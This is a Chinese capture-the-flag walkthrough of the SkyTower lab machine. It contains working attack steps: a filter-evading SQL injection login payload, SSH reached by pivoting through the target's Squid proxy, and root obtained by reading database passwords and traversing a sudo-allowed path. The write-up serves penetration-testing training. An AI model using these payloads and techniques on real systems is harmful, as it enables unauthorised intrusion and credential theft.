【SkyTower靶场渗透】

文章目录

一、基础信息

二、信息收集

三、漏洞探测

四、ssh登录

五、提权


一、基础信息

Kali IP:192.168.20.146

靶机IP:192.168.20.149

二、信息收集

端口扫描

nmap -sS -sV -p- -A 192.168.20.149

开放了22、80、3128等端口

80:apache httpd 2.2.22

3128:squid 3.1.20

访问一下80页面,后台php语言,版本5.4.4

目录扫描

80页面目录扫描没有发现

3128端口扫描也没发现

三、漏洞探测

只能先从80登录页面入手,直接抓包sqlmap梭哈,发现注入不出

尝试手工测试,发现有很多过滤,过滤了or,=,group,union,select,and,逗号等等,email与password参数均为单引号闭合

还是先尝试万能密码,or与and过滤可以用&&或者||绕过,=过滤可以用like

Payload=' || 'a' like 'a

得到了邮箱信息,以及账户密码:john/hereisjohn

参考其他wp,也可以用常用注入语句进行测试。

https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list

intruder进行sql注入爆破,选择email和password参数,攻击类型设置:pitchfork

同样注入成功,但是有点不太理解为什么会成功。

四、ssh登录

现在有了账号密码信息,尝试ssh登录但是没有成功,端口状态为filtered

尝试从3128端口寻找突破口,页面提示信息squid 3.1.20

查了一下,Squid是一套代理服务器和Web缓存服务器软件,提供缓存万维网、过滤流量、代理上网等功能。

查到两个漏洞信息,一个缓冲区溢出,一个拒绝服务攻击,尝试了一下没有结果

想到squid提供的代理服务,尝试设置代理访问

proxychains使用参考https://zhuanlan.zhihu.com/p/166375631

vim /etc/proxychains4.conf

http 192.168.20.149 3128

通过代理,连接ssh

proxychains ssh john@192.168.20.149 -t "/bin/sh"

五、提权

Sudo提权:提示没有

Suid位提权:没有发现

到辅助网站查询命令:https://gtfobins.github.io/

内核提权:Uname -a;cat /etc/*release

版本漏洞搜索后没有利用成功,继续尝试其他方式

计划任务:没有发现

查看定时任务

find /etc/*cron* -type f -ls 2>/dev/null

查看定时任务内容

find /etc/*cron* -type f -ls 2>/dev/null -exec cat {} \; > /tmp/cron.txt

grep '\*' /tmp/cron.txt

/var/spool/cron下没有查看权限

似乎当前账号没找到好的提权方式,继续做一下信息收集

在网站根目录/var/www下的login.php文件中发现数据库账户密码

mysql -u root -proot

在数据库中查到用户登录信息

use SkyTech;

select * from login;

账户信息:

sara/ihatethisjob

William/senseable //提示密码不对,无法登录

登录到sara账户尝试提权,发现有sudo命令可利用

但是指定路径/accounts下没有任何文件,Suid位也没有可利用信息

但是看了wp发现这里可以用目录遍历的形势查看文件

查看目录下有哪些文件

sudo ls /accounts/../

sudo ls /accounts/../root

查看 flag 文件

sudo cat /accounts/../root/flag.txt

得到root账户密码theskytower

切换到root即可,提权成功。

相关推荐
XLYcmy1 小时前
三篇物联网漏洞挖掘综述
论文阅读·物联网·网络安全·静态分析·漏洞挖掘·动态分析·固件
晚秋贰拾伍1 小时前
设计模式的艺术-代理模式
运维·安全·设计模式·系统安全·代理模式·运维开发·开闭原则
hwscom1 小时前
Windows Server 2025如何做系统安全加固
windows·安全·系统安全
JZC_xiaozhong2 小时前
低空经济中的数据孤岛难题,KPaaS如何破局?
大数据·运维·数据仓库·安全·ci/cd·数据分析·数据库管理员
是Dream呀3 小时前
引领AI发展潮流:打造大模型时代的安全与可信——CCF-CV企业交流会走进合合信息会议回顾
人工智能·安全·生成式ai
摘星怪sec3 小时前
【漏洞复现】|方正畅享全媒体新闻采编系统reportCenter.do/screen.do存在SQL注入
数据库·sql·web安全·媒体·漏洞复现
CIb0la4 小时前
Dangerzone:免费的危险的文件转换安全程序
安全
qq_2430507912 小时前
irpas:互联网路由协议攻击套件!全参数详细教程!Kali Linux入门教程!黑客渗透测试!
linux·网络·web安全·网络安全·黑客·渗透测试·系统安全
知行EDI13 小时前
EDI安全:2025年数据保护与隐私威胁应对策略
安全·edi·电子数据交换·知行软件